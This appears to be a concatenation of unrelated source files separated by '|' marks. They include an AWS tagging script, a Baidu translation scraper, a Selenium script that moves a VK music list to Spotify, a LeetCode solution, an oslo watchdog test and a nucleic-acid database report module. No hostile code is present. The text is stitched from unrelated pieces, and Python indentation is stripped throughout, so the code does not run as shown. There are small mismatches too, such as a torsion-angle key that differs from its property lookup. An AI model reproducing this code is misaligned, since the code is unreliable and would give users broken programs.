print ' -> Get "Page_Select" memory: %02X' % map.CONFIG_GET('Page_Select')
map.CONFIG_SET('Debug_Cmd_Param1', 0xABCD)
print ' -> Get "Debug_Cmd_Param1" memory:',
aReadBuf = map.CONFIG_GET('Debug_Cmd_Param1')
for i in range(len(aReadBuf)):
print '%02X' % aReadBuf[i],
print
print ' ---- Test Done ---- '
|
import csv, sys
import boto3
column_headers = ["tag_channel", "resource_id", "service"]
column_index = {"tag_channel": None, "resource_id": None, "service": None}
service_names = {"AmazonEC2": "ec2", "AmazonS3": "s3api", "AmazonVPC": "ec2", "AWSLambda": "lambda", "AmazonApiGateway": "apigateway"}
found_headers=False
client = boto3.client("ec2")
clientAPIGateway = boto3.client("apigateway")
clientLambda = boto3.client("lambda")
with open("sample_september.csv") as csv_file:
csv_reader = csv.reader(csv_file, delimiter=",")
# read csv file row by row
for row in csv_reader:
if not found_headers:
# loop through list containing column headers
print("column_index:", column_index)
for header in column_headers:
try:
print("Header:", header)
# find index for column header
column_index[header] = row.index(header)
print("column_index[header] ", column_index[header])
except Exception as e:
print("Caught an exception when looking up index:", e)
# unable to locate column header from file; exit program
sys.exit()
# assign to True to skip header lookup on next row
found_headers=True
print("column_index:", column_index)
else:
# print tag and its index
#print(row)
print("service:", service_names[row[column_index['service']]], "resource_id:",row[column_index['resource_id']], "tag_channel:",row[column_index['tag_channel']])
if service_names[row[column_index['service']]] == 'ec2':
print("It is EC2")
response = client.create_tags(
DryRun = False,
Resources = [
row[column_index['resource_id']],
],
Tags=[{
'Key': 'Channel',
'Value': row[column_index['tag_channel']]
}])
if service_names[row[column_index['service']]] == 'apigateway':
print("API Gateway")
response = clientAPIGateway.tag_resource(
resourceArn = row[column_index['resource_id']],
tags={
'Channel' : row[column_index['tag_channel']]
})
if service_names[row[column_index['service']]] == 'lambda':
print("AWS Lambda")
response = clientLambda.tag_resource(
Resource = row[column_index['resource_id']],
Tags={
'Channel' : row[column_index['tag_channel']]
})
|
import requests
import json
class fanyi:
def __init__(self,keyword):
self.keyword = keyword
def result(self):
url = "https://fanyi.baidu.com/extendtrans"
# 设置提交数据
posData = {"query": self.keyword,
"from": "en",
"to": "zh"}
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Mobile Safari/537.36'
}
req = requests.post(url,posData,headers=headers)
json_data = json.loads(req.content.decode())
# 然后我们可以通过格式化工具进行json的解析
return ','.join(json_data["data"]["st_tag"])
if __name__=="__main__":
keyword = input()
a = fanyi(keyword)
print(a.result())
|
#!/usr/bin/env python2.7
# encoding: utf-8
"""
std_asymmetries.py
Created by Jakub Konka on 2012-05-31.
Copyright (c) 2012 University of Strathclyde. All rights reserved.
"""
from __future__ import division
import sys
import os
import math
import numpy as np
import scipy.integrate as integrate
import matplotlib.pyplot as plt
def main():
# Params
v1 = [0.125, 0.625]
v2 = [0.375, 0.875]
# Bid bounds
b = [(4 * v1[0] * v2[0] - (v1[1] + v2[1])**2) / (4 * (v1[0] - v1[1] + v2[0] - v2[1])), (v1[1] + v2[1]) / 2]
print(b)
# Constants of integration
c1 = ((v2[1]-v1[1])**2 + 4*(b[0]-v2[1])*(v1[0]-v1[1])) / (-2*(b[0]-b[1])*(v1[0]-v1[1])) * math.exp((v2[1]-v1[1]) / (2*(b[0]-b[1])))
c2 = ((v1[1]-v2[1])**2 + 4*(b[0]-v1[1])*(v2[0]-v2[1])) / (-2*(b[0]-b[1])*(v2[0]-v2[1])) * math.exp((v1[1]-v2[1]) / (2*(b[0]-b[1])))
print(c1)
print(c2)
# Inverse bid functions
vf1 = lambda x: v1[1] + (v2[1]-v1[1])**2 / (c1*(v2[1]+v1[1]-2*x)*math.exp((v2[1]-v1[1])/(v2[1]+v1[1]-2*x)) + 4*(v2[1]-x))
vf2 = lambda x: v2[1] + (v1[1]-v2[1])**2 / (c2*(v1[1]+v2[1]-2*x)*math.exp((v1[1]-v2[1])/(v1[1]+v2[1]-2*x)) + 4*(v1[1]-x))
# Sampling & plotting
bids = np.linspace(b[0], b[1], 100)
graph_vf1 = map(vf1, bids)
graph_vf2 = map(vf2, bids)
plt.figure()
plt.plot(bids, graph_vf1, '-', linewidth=2)
plt.plot(bids, graph_vf2, '--', linewidth=2)
plt.xlabel(r"Bid, $b$")
plt.ylabel(r"Value, $v(b)$")
plt.grid()
plt.figure()
plt.plot(graph_vf1, bids, '-', linewidth=2)
plt.plot(graph_vf2, bids, '--', linewidth=2)
plt.xlabel(r"Value, $v$")
plt.ylabel(r"Bid, $b(v)$")
plt.grid()
plt.show()
if __name__ == '__main__':
main()
|
"""
LeetCode - Easy
"""
"""
Given a positive integer num, write a function which returns True if num is a perfect square else False.
Follow up: Do not use any built-in library function such as sqrt.
Example 1:
Input: num = 16
Output: true
Example 2:
Input: num = 14
Output: false
Constraints:
1 <= num <= 2^31 - 1
"""
class Solution:
def isPerfectSquare(self, num: int) -> bool:
left = 0
right = num
pivot = (left + right)//2
while left <= right:
if pivot * pivot == num:
return True
if pivot * pivot < num:
left = pivot + 1
else:
right = pivot - 1
pivot = (left + right)//2
return False
if __name__ == '__main__':
num = 17
print(Solution().isPerfectSquare(num))
|
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import subprocess
import time
import fixtures
from oslotest import base as test_base
from oslo_concurrency import watchdog
LOG_FORMAT = '%(levelname)s %(message)s'
class WatchdogTest(test_base.BaseTestCase):
def setUp(self):
super(WatchdogTest, self).setUp()
# capture the log bits where we can interrogate them
self.logger = logging.getLogger()
self.logger.setLevel(logging.DEBUG)
self.log = self.useFixture(
fixtures.FakeLogger(format=LOG_FORMAT, level=None)
)
def test_in_process_delay(self):
with watchdog.watch(self.logger, "in process", after=1.0):
time.sleep(2)
self.assertIn("DEBUG in process not completed after 1",
self.log.output)
loglines = self.log.output.rstrip().split("\n")
self.assertEqual(1, len(loglines), loglines)
def test_level_setting(self):
with watchdog.watch(self.logger, "in process",
level=logging.ERROR, after=1.0):
time.sleep(2)
self.assertIn("ERROR in process not completed after 1",
self.log.output)
loglines = self.log.output.rstrip().split("\n")
self.assertEqual(1, len(loglines), loglines)
def test_in_process_delay_no_message(self):
with watchdog.watch(self.logger, "in process", after=1.0):
pass
# wait long enough to know there won't be a message emitted
time.sleep(2)
self.assertEqual('', self.log.output)
def test_in_process_exploding(self):
try:
with watchdog.watch(self.logger, "ungraceful exit", after=1.0):
raise Exception()
except Exception:
pass
# wait long enough to know there won't be a message emitted
time.sleep(2)
self.assertEqual('', self.log.output)
def test_subprocess_delay(self):
with watchdog.watch(self.logger, "subprocess", after=0.1):
subprocess.call("sleep 2", shell=True)
self.assertIn("DEBUG subprocess not completed after 0",
self.log.output)
|
echo "hello world"
echo "learning"
|
from selenium import webdriver
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.chrome.options import Options
import json
from time import sleep
from bs4 import BeautifulSoup
import sys
import os
gui_options = Options()
gui_options.add_argument('--log-level=3')
def question():
qSilence = input("Тихий перенос (без отображения GUI) Y/N ?\n")
if qSilence == "Y":
gui_options.headless = True
os.system('cls')
elif qSilence == "N":
gui_options.headless = False
os.system('cls')
else:
os.system('cls')
print("Введите Y или N")
question()
question()
driver = webdriver.Chrome(options=gui_options)
wait = WebDriverWait(driver, 30)
wait_for_track = WebDriverWait(driver, 3)
def login_vk():
try:
vk_login = json.load(open("data.json"))['vk']['login']
vk_pass = json.load(open("data.json"))['vk']['password']
driver.get("https://vk.com/login")
wait.until(ec.visibility_of_element_located((By.ID, 'email')))
login_field_vk = driver.find_element_by_id("email").send_keys(vk_login)
wait.until(ec.visibility_of_element_located((By.ID, 'pass')))
pass_field_vk = driver.find_element_by_id("pass").send_keys(vk_pass)
wait.until(ec.visibility_of_element_located((By.ID, 'login_button')))
submit_vk = driver.find_element_by_id("login_button").click()
return print("Вход в VK успешен")
except:
return False
def Go_to_music_vk():
try:
wait.until(ec.visibility_of_element_located((By.XPATH, '//*[@id="l_aud"]/a')))
music_vk = driver.find_element_by_xpath('//*[@id="l_aud"]/a').click()
print("Перешёл в раздел музыки")
except:
return False
def Scroll_page():
try:
last_height = driver.execute_script("return document.body.scrollHeight")
while True:
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
sleep(2)
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
print("Страница успешно проскроллена")
return
except:
return False
def Get_music_list(music_vk_html, music_vk_list):
try:
for i in driver.find_elements_by_class_name("audio_row__inner"):
music_vk_html.append(i.get_attribute("innerHTML"))
for i in range(len(music_vk_html)):
soup = BeautifulSoup(music_vk_html[i], "lxml")
music = soup.find(class_="audio_row__title_inner _audio_row__title_inner").text
music += " " + soup.find("a").text
music_vk_list.append(music)
print(f"Список песен получен\nКоличество песен:{len(music_vk_list)}")
except:
return False
def login_spotify():
try:
spotify_login = json.load(open("data.json"))['spotify']['login']
spotify_pass = json.load(open("data.json"))['spotify']['password']
driver.get("https://accounts.spotify.com/ru/login/?continue=https://open.spotify.com/search")
wait.until(ec.visibility_of_element_located((By.ID, 'login-username')))
login_field_spotify = driver.find_element_by_id("login-username").send_keys(spotify_login)
wait.until(ec.visibility_of_element_located((By.ID, 'login-password')))
pass_field_spotify = driver.find_element_by_id("login-password").send_keys(spotify_pass)
wait.until(ec.visibility_of_element_located((By.ID, 'login-button')))
submit_spotify = driver.find_element_by_id("login-button").click()
print("Вход в Spotify успешен")
except:
return False
def Translate_BMP(list_obj):
new_list = []
non_bmp_map = dict.fromkeys(range(0x10000, sys.maxunicode + 1), 0xfffd)
for i in range(len(list_obj)):
new_list.append(list_obj[i].translate(non_bmp_map))
return new_list
def Add_music(music_vk_list):
translated_list = Translate_BMP(music_vk_list)
wait.until(ec.visibility_of_element_located((By.XPATH, '//*[@id="main"]/div/div[2]/div[1]/header/div[3]/div/div/input')))
translated_list.reverse()
for i in range(len(translated_list)):
try:
print("============================")
driver.find_element_by_xpath('//*[@id="main"]/div/div[2]/div[1]/header/div[3]/div/div/input').send_keys(translated_list[i]) #search field
wait_for_track.until(ec.element_to_be_clickable((By.XPATH, '//*[@id="searchPage"]/div/div/section[2]/div/div[2]/div/div/div[2]/div[1]/div/div/div[2]/button'))) # wait for button
driver.find_element_by_xpath('//*[@id="searchPage"]/div/div/section[2]/div/div[2]/div/div/div[2]/div[1]/div/div/div[2]/button').click() #heart click
driver.find_element_by_xpath('//*[@id="main"]/div/div[2]/div[1]/header/div[3]/div/div/div/button').click() #clean searh
print(f"Трек '{translated_list[i]}' успешно добавлен\nОсталось треков:{len(translated_list) - i}")
wait_for_track.until(ec.url_changes(driver.current_url))
except:
driver.find_element_by_xpath('//*[@id="main"]/div/div[2]/div[1]/header/div[3]/div/div/div/button').click()
print(f"Не удалось добавить трек {translated_list[i]}\nОсталось треков:{len(translated_list) - i}")
continue
def main():
music_vk_html = []
music_vk_list = []
print("============================")
if login_vk() == False:
print("Ошибка при логине в VK")
print("Программа завершиться через 10 секунд")
print("============================")
sleep(10)
sys.exit()
print("============================")
if Go_to_music_vk() == False:
print("Ошибка при переходе в раздел музыки")
print("Программа завершиться через 10 секунд")
print("============================")
sleep(10)
sys.exit()
print("============================")
if Scroll_page() == False:
print("Ошибка при скролле страницы")
print("Программа завершиться через 10 секунд")
print("============================")
sleep(10)
sys.exit()
print("============================")
if Get_music_list(music_vk_html, music_vk_list) == False:
print("Ошибка при получении композиций")
print("Программа завершиться через 10 секунд")
print("============================")
sleep(10)
sys.exit()
print("============================")
if login_spotify() == False:
print("Ошибка при логине в Spotify")
print("Программа завершиться через 10 секунд")
print("============================")
sleep(10)
sys.exit()
print("============================")
if Add_music(music_vk_list) == False:
print("Ошибка при добавлении музыки в Spotify")
print("Программа завершиться через 10 секунд")
print("============================")
sleep(10)
sys.exit()
print("============================")
if __name__ == "__main__":
main() |
import cv2
import random
import numpy as np
scale = 0.5
circles = []
counter = 0
counter2 = 0
point1 = []
point2 = []
myPoints = []
myColor = []
path = '/Users/fneut/Desktop/PP/QueryImages'
def mousePoints(event,x,y,flags,params):
global counter,point1,point2,counter2,circles,myColor
if event == cv2.EVENT_LBUTTONDOWN:
if counter == 0:
point1 = int(x//scale),int(y//scale)
counter += 1
myColor = (random.randint(0,2)*200,random.randint(0,2)*200,random.randint(0,2)*200)
print("uno")
elif counter == 1:
point2 = int(x//scale),int(y//scale)
name = input('Enter Name ')
myPoints.append([point1,point2,name])
counter = 0
print("dos")
print(x,",",y)
circles.append([x,y,myColor])
counter2 += 1
img = cv2.imread(path + "/" + 'imquery.png')
#img = cv2.resize(img, (0,0), None, scale, scale)
h,w,c = img.shape
img = cv2.resize(img,(w//2,h//2))
while True:
for x,y,color in circles:
cv2.circle(img, (x,y), 3, color, cv2.FILLED)
cv2.imshow("Original Image", img)
cv2.setMouseCallback("Original Image", mousePoints)
if cv2.waitKey(1) & 0xff == ord('s'):
print(myPoints)
break
|
H, W = map( int, input().split())
A = [ input() for _ in range(H)]
dp = [[0]*W for _ in range(H)]
dp[0][0] = 1
Q = 10**9+7
for i in range(H):
for j in range(W):
if not i == H-1:
if A[i+1][j] == ".":
dp[i+1][j] = (dp[i+1][j] + dp[i][j])%Q
if not j == W-1:
if A[i][j+1] == ".":
dp[i][j+1] = (dp[i][j+1] + dp[i][j])%Q
print(dp[H-1][W-1])
|
import pytest
import pdb
test_id = f"{'2.3.3':<10} - Profile Snapshot"
test_weight = 10
def test_profile_snapshot(host):
assert 0 == 1, "TODO - Write Test"
|
import os
import argparse
def parse_command():
parser = argparse.ArgumentParser()
parser.add_argument(
'--data_dir',
type=str,
default=os.path.join(os.getenv('HOME'), 'data'),
help="""\
Where to download the speech training data to. Or where it is already saved.
""")
parser.add_argument(
'--preprocessed_data_dir',
type=str,
default=os.path.join(os.getenv('HOME'), 'data/speech_commands_preprocessed'),
help="""\
Where to store preprocessed speech data (spectrograms) or load it, if it exists
with the same parameters as are used in the current run.
""")
parser.add_argument(
'--save_preprocessed_data',
type=bool,
default=True,
help="""\
Where to download the speech training data to. Or where it is already saved.
""")
parser.add_argument(
'--background_volume',
type=float,
default=0.1,
help="""\
How loud the background noise should be, between 0 and 1.
""")
parser.add_argument(
'--background_frequency',
type=float,
default=0.8,
help="""\
How many of the training samples have background noise mixed in.
""")
parser.add_argument(
'--silence_percentage',
type=float,
default=10.0,
help="""\
How much of the training data should be silence.
""")
parser.add_argument(
'--unknown_percentage',
type=float,
default=10.0,
help="""\
How much of the training data should be unknown words.
""")
parser.add_argument(
'--time_shift_ms',
type=float,
default=100.0,
help="""\
Range to randomly shift the training audio by in time.
""")
parser.add_argument(
'--sample_rate',
type=int,
default=16000,
help='Expected sample rate of the wavs',)
parser.add_argument(
'--clip_duration_ms',
type=int,
default=1000,
help='Expected duration in milliseconds of the wavs',)
parser.add_argument(
'--window_size_ms',
type=float,
default=30.0,
help='How long each spectrogram timeslice is',)
parser.add_argument(
'--window_stride_ms',
type=float,
default=20.0,
help='How long each spectrogram timeslice is',)
parser.add_argument(
'--dct_coefficient_count',
type=int,
default=40,
help='How many bins to use for the MFCC fingerprint',)
parser.add_argument(
'--epochs',
type=int,
default=50,
help='How many epochs to train',)
parser.add_argument(
'--num_train_samples',
type=int,
default=85511,
help='How many samples from the training set to use',)
parser.add_argument(
'--num_val_samples',
type=int,
default=10102,
help='How many samples from the validation set to use',)
parser.add_argument(
'--num_test_samples',
type=int,
default=4890,
help='How many samples from the test set to use',)
parser.add_argument(
'--batch_size',
type=int,
default=100,
help='How many items to train with at once',)
parser.add_argument(
'--model_architecture',
type=str,
default='ds_cnn',
help='What model architecture to use')
parser.add_argument(
'--run_test_set',
type=bool,
default=True,
help='Run model.eval() on test set if True')
parser.add_argument(
'--saved_model_path',
type=str,
default='trained_models/scratch',
help='File name to load pretrained model')
parser.add_argument(
'--tfl_file_name',
default='aww_model.tflite',
help='File name to which the TF Lite model will be saved')
Flags, unparsed = parser.parse_known_args()
return Flags, unparsed
|
from typing import TypeVar
from ndb_adapter.ndb_download import DownloadHelper
from ndb_adapter.ndb_download import DownloadType
def _assign_numbers(dic: dict) -> dict:
"""Private function for assign numbers values to dictionary
:param dic: report dictionary
:type dic: dict
:return: report dictionary
:rtype: dict
"""
for k, v in dic.items():
try:
if '.' in v:
dic[k] = float(v)
else:
dic[k] = int(v)
except ValueError:
pass
return dic
class SimpleReport(object):
"""Class for simple result report"""
def __init__(self, report: dict = None):
"""Default constructor
:param report: report dictionary (default value = None)
:type report: dict
"""
self._report = {
'NDB ID': '',
'PDB ID': '',
'Classification': '',
'Title': '',
'PDB Release Date': '',
'Authors': '',
'Citation Title': '',
'Citation Detail': '',
'Experiment': '',
'Resolution': 0,
'R work': 0,
'R free': 0
}
if report:
self._report.update(report)
@property
def pdb_id(self) -> str:
"""Gets simple report structure PDB
:return: PDB ID
:rtype: str
"""
return self._report['PDB ID']
@property
def ndb_id(self) -> str:
"""Gets simple report structure NDB ID
:return: NDB ID
:rtype: str
"""
return self._report['NDB ID']
@property
def title(self) -> str:
"""Gets simple report structure title
:return: title
:rtype: str
"""
return self._report['Title']
@property
def classification(self) -> str:
"""Gets simple report structure classification
:return: classification
:rtype: str
"""
return self._report['Classification']
@property
def release_date(self) -> str:
"""Gets simple report structure release date
:return: release date
:rtype: str
"""
return self._report['PDB Release Date']
@property
def authors(self) -> str:
"""Gets simple report structure authors
:return: authots
:rtype: str
"""
return self._report['Authors']
@property
def citation_title(self) -> str:
"""Gets simple report structure citation title
:return: citation title
:rtype: str
"""
return self._report['Citation Title']
@property
def citation_detail(self) -> str:
"""Gets simple report structure citation title
:return: citation detail
:rtype: str
"""
return self._report['Citation Detail']
@property
def experimental_method(self) -> str:
"""Gets simple report structure experimental method
:return: experimental method
:rtype: str
"""
return self._report['Experiment']
@property
def resolution(self) -> float:
"""Gets simple report structure resolution
:return: resolution
:rtype: float
"""
return self._report['Resolution']
@property
def r_work(self) -> float:
"""Gets simple report structure r work
:return: r work
:rtype: float
"""
return self._report['R work']
@property
def r_free(self) -> float:
"""Gets simple report structure r free
:return: r free
:rtype: float
"""
return self._report['R free']
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""Download PDB from ndb
:param download_type: file download type (default value is DownloadType.PDB)
:type download_type: DownloadType
:param target_dir: where to save file (default value is current dir)
:type target_dir: str
:param save: tells if file should be saved or not (default value = False)
:type save: bool
:return: string or None
:rtype: str
"""
id_structure = self.pdb_id
if not self.pdb_id:
print("No pdb_id trying ndb_id")
id_structure = self.ndb_id
return DownloadHelper.download(id_structure, download_type, save, target_dir)
def get_dict(self) -> dict:
"""Gets simple report as dict
:return: simple report dict
:rtype: dict
"""
return self._report
def __str__(self) -> str:
return str(self._report)
class _AdvancedBaseReport(object):
"""Base class for advanced reports"""
def __init__(self):
"""Default constructor"""
self._report = {
'NDB ID': ''
}
def _update(self, report: dict) -> None:
"""Private method to update inner report dict
:param report: extending report dict
:type report: dict
:return: None
"""
self._report.update(report)
@staticmethod
def report_type() -> str:
"""Advanced report type - depends of search"""
raise NotImplementedError
@property
def ndb_id(self) -> str:
"""Gets advanced report structure NDB ID
:return: NDB ID
:rtype: str
"""
return self._report['NDB ID']
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""To download files from NDB - only works for some reports"""
raise NotImplementedError
def get_dict(self) -> dict:
"""Gets advanced report as dict
:return: advanced report dict
:rtype: dict
"""
return self._report
def __str__(self) -> str:
return str(self._report)
class NDBStatusReport(_AdvancedBaseReport):
"""Class for NDB status search report extending _AdvancedBaseReport"""
def __init__(self, report: dict= None):
"""Default constructor
:param report: report dict to make report (default value = None)
:type report: dict"""
super().__init__()
self._update({
'PDB ID': '',
'Title': '',
'NDB Release Date': '',
'Authors': '',
'Initial Deposition Date': ''
})
if report:
self._update(report)
@staticmethod
def report_type() -> str:
return 'ndbStatus'
@property
def pdb_id(self) -> str:
"""Gets advanced report structure PDB ID
:return: PDB ID
:rtype: str
"""
return self._report['PDB ID']
@property
def title(self) -> str:
"""Gets advanced report structure title
:return: title
:rtype: str
"""
return self._report['Title']
@property
def release_date(self) -> str:
"""Gets advanced report structure NDB release date
:return: release date
:rtype: str
"""
return self._report['NDB Release Date']
@property
def deposition_date(self) -> str:
"""Gets advanced report structure initial deposition date
:return: initial deposition date
:rtype: str
"""
return self._report['Initial Deposition Date']
@property
def authors(self) -> str:
"""Gets advanced report structure authors
:return: authors
:rtype: str
"""
return self._report['Authors']
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""Download PDB from NDB
:param download_type: file download type (default value is DownloadType.PDB)
:type download_type: DownloadType
:param target_dir: where to save file (default value is current dir)
:type target_dir: str
:param save: tells if file should be saved or not (default value = False)
:type save: bool
:return: string or None
:rtype: str
"""
id_structure = self.pdb_id
if not self.pdb_id:
print("No pdb_id trying ndb_id")
id_structure = self.ndb_id
return DownloadHelper.download(id_structure, download_type, save, target_dir)
class CellDimensionsReport(_AdvancedBaseReport):
"""Class for cell dimensions search report extending _AdvancedBaseReport"""
def __init__(self, report: dict = None):
"""Default constructor
:param report: report dict to make report (default value = None)
:type report: dict"""
super().__init__()
self._update({
'Length A': 0,
'Length B': 0,
'Length C': 0,
'Angle Alpha': 0,
'Angle Beta': 0,
'Angle Gamma': 0,
'Space Group': ''
})
if report:
self._update(_assign_numbers(report))
@staticmethod
def report_type() -> str:
return 'cellDim'
@property
def cell_a(self) -> float:
"""Gets advanced report structure cell a in angstroms
:return: cell a
:rtype: float
"""
return self._report['Length A']
@property
def cell_b(self) -> float:
"""Gets advanced report structure cell b in angstroms
:return: cell b
:rtype: float
"""
return self._report['Length B']
@property
def cell_c(self) -> float:
"""Gets advanced report structure cell c in angstroms
:return: cell c
:rtype: float
"""
return self._report['Length C']
@property
def cell_alpha(self) -> float:
"""Gets advanced report structure cell alpha in degrees
:return: alpha
:rtype: float
"""
return self._report['Angle Alpha']
@property
def cell_beta(self) -> float:
"""Gets advanced report structure cell beta in degrees
:return: beta
:rtype: float
"""
return self._report['Angle Beta']
@property
def cell_gamma(self) -> float:
"""Gets advanced report structure cell gamma in degrees
:return: gamma
:rtype: float
"""
return self._report['Angle Gamma']
@property
def space_group(self) -> str:
"""Gets advanced report structure space group
:return: space group
:rtype: float
"""
return self._report['Space Group']
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""NOT WORKS ON THIS REPORT TYPE"""
pass
class CitationReport(_AdvancedBaseReport):
"""Class for citation search report extending _AdvancedBaseReport"""
def __init__(self, report: dict = None):
"""Default constructor
:param report: report dict to make report (default value = None)
:type report: dict"""
super().__init__()
self._update({
'PDB ID': '',
'Citation Title': '',
'Citation Authors': '',
'Journal': '',
'Pubmed ID': '',
'Year': 0
})
if report:
self._update(_assign_numbers(report))
@staticmethod
def report_type() -> str:
return 'citation'
@property
def pdb_id(self) -> str:
"""Gets advanced report structure PDB ID
:return: PDB ID
:rtype: str
"""
return self._report['PDB ID']
@property
def citation_title(self) -> str:
"""Gets advanced report structure citation title
:return: citation title
:rtype: str
"""
return self._report['Citation Title']
@property
def citation_authors(self) -> str:
"""Gets advanced report structure citation authors
:return: citation authors
:rtype: str
"""
return self._report['Citation Authors']
@property
def journal(self) -> str:
"""Gets advanced report structure Journal
:return: Journal
:rtype: str
"""
return self._report['Journal']
@property
def pubmed_id(self) -> str:
"""Gets advanced report structure pubmed ID
:return: PDB ID
:rtype: str
"""
return self._report['Pubmed ID']
@property
def year(self) -> int:
"""Gets advanced report structure year
:return: year
:rtype: int
"""
return self._report['Year']
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""Download PDB from NDB
:param download_type: file download type (default value is DownloadType.PDB)
:type download_type: DownloadType
:param target_dir: where to save file (default value is current dir)
:type target_dir: str
:param save: tells if file should be saved or not (default value = False)
:type save: bool
:return: string or None
:rtype: str
"""
id_structure = self.pdb_id
if not self.pdb_id:
print("No pdb_id trying ndb_id")
id_structure = self.ndb_id
return DownloadHelper.download(id_structure, download_type, save, target_dir)
class RefinementDataReport(_AdvancedBaseReport):
"""Class for refinement data search report extending _AdvancedBaseReport"""
def __init__(self, report: dict = None):
"""Default constructor
:param report: report dict to make report (default value = None)
:type report: dict"""
super().__init__()
self._update({
'R-value_work': 0,
'R-value_obs': 0,
'R-value_free': 0,
'Higher Resolution Limit': 0,
'Lower Resolution Limit': 0,
'Reflections Observed': 0,
'Structure Refinement': ''
})
if report:
self._update(_assign_numbers(report))
@staticmethod
def report_type() -> str:
return 'ref'
@property
def r_work(self) -> float:
"""Gets advanced report structure r work
:return: r work
:rtype: float
"""
return self._report['R-value_work']
@property
def r_obs(self) -> float:
"""Gets advanced report structure r obs
:return: r obs
:rtype: float
"""
return self._report['R-value_obs']
@property
def r_free(self) -> float:
"""Gets advanced report structure r free
:return: r free
:rtype: float
"""
return self._report['R-value_free']
@property
def higher_resolution(self) -> float:
"""Gets advanced report structure higher resolution limit
:return: higher resolution limit
:rtype: float
"""
return self._report['Higher Resolution Limit']
@property
def lower_resolution(self) -> float:
"""Gets advanced report structure lower resolution limit
:return: lower resolution limit
:rtype: float
"""
return self._report['Lower Resolution Limit']
@property
def reflections(self) -> int:
"""Gets advanced report structure reflections observed
:return: reflections observed
:rtype: int
"""
return self._report['Reflections Observed']
@property
def structure_ref(self) -> str:
"""Gets advanced report structure refinement
:return: structure refinement
:rtype: str
"""
return self._report['Structure Refinement']
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""NOT WORKS ON THIS REPORT TYPE"""
pass
class NABackboneTorsionReport(_AdvancedBaseReport):
"""Class for refinement data search report extending _AdvancedBaseReport"""
def __init__(self, report: dict = None):
"""Default constructor
:param report: report dict to make report (default value = None)
:type report: dict"""
super().__init__()
self._update({
'Model ID': '',
'Chain ID': '',
'Residue Num': 0,
'Residue Name': '',
"O3'-P-O5'-C5": 0,
"P-O5'-C5'-C4'": 0,
"O5'-C5'-C4'-C3'": 0,
"C5'-C4'-C3'-O3'": 0,
"C4'-C3'-O3'-P": 0,
"C3'-O3'-P-O5'": 0,
"O4'-C1'-N1-9-C2-4": 0
})
if report:
self._update(_assign_numbers(report))
@staticmethod
def report_type() -> str:
return 'nabt'
@property
def model_id(self) -> str:
"""Gets advanced report structure model ID
:return: model ID
:rtype: str
"""
return self._report['Model ID']
@property
def chain_id(self) -> str:
"""Gets advanced report structure chain ID
:return: chain ID
:rtype: str
"""
return self._report['Chain ID']
@property
def residue_number(self) -> int:
"""Gets advanced report structure residue number
:return: residue number
:rtype: int
"""
return self._report['Residue Num']
@property
def residue_name(self) -> str:
"""Gets advanced report structure residue name
:return: residue name
:rtype: str
"""
return self._report['Residue Name']
@property
def o3_p_o5_c5(self) -> float:
"""Gets advanced report structure O3'-P-O5'-C5'
:return: O3'-P-O5'-C5'
:rtype: float
"""
return self._report["O3'-P-O5'-C5'"]
@property
def p_o5_c5_c4(self) -> float:
"""Gets advanced report structure P-O5'-C5'-C4'
:return: P-O5'-C5'-C4'
:rtype: float
"""
return self._report["P-O5'-C5'-C4'"]
@property
def o5_c5_c4_c3(self) -> float:
"""Gets advanced report structure O5'-C5'-C4'-C3'
:return: O5'-C5'-C4'-C3'
:rtype: float
"""
return self._report["O5'-C5'-C4'-C3'"]
@property
def c5_c4_c3_o3(self) -> float:
"""Gets advanced report structure C5'-C4'-C3'-O3'
:return: C5'-C4'-C3'-O3'
:rtype: float
"""
return self._report["C5'-C4'-C3'-O3'"]
@property
def c4_c3_o3_p(self) -> float:
"""Gets advanced report structure C4'-C3'-O3'-P
:return: C4'-C3'-O3'-P
:rtype: float
"""
return self._report["C4'-C3'-O3'-P"]
@property
def c3_o3_p_o5(self) -> float:
"""Gets advanced report structure C3'-O3'-P-O5'
:return: C3'-O3'-P-O5'
:rtype: float
"""
return self._report["C3'-O3'-P-O5'"]
@property
def o4_c1_n1_9_c2_4(self) -> float:
"""Gets advanced report structure O4'-C1'-N1-9-C2-4
:return: O4'-C1'-N1-9-C2-4
:rtype: float
"""
return self._report["O4'-C1'-N1-9-C2-4"]
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""NOT WORKS ON THIS REPORT TYPE"""
pass
class BasePairParameterReport(_AdvancedBaseReport):
"""Class for base pair parameter search report extending _AdvancedBaseReport"""
def __init__(self, report: dict = None):
"""Default constructor
:param report: report dict to make report (default value = None)
:type report: dict"""
super().__init__()
self._update({
'Model Number': 0,
'Pair Number': 0,
'Pair Name': '',
'Shear': 0,
'Stretch': 0,
'Stagger': 0,
'Buckle': 0,
'Propellor': 0,
'Opening': 0
})
if report:
self._update(_assign_numbers(report))
@staticmethod
def report_type() -> str:
return 'bpp'
@property
def model_num(self) -> int:
"""Gets advanced report structure model number
:return: model number
:rtype: int
"""
return self._report['Model Number']
@property
def pair_num(self) -> int:
"""Gets advanced report structure pair number
:return: pair number
:rtype: int
"""
return self._report['Pair Number']
@property
def pair_name(self) -> str:
"""Gets advanced report structure pair name
:return: pair name
:rtype: str
"""
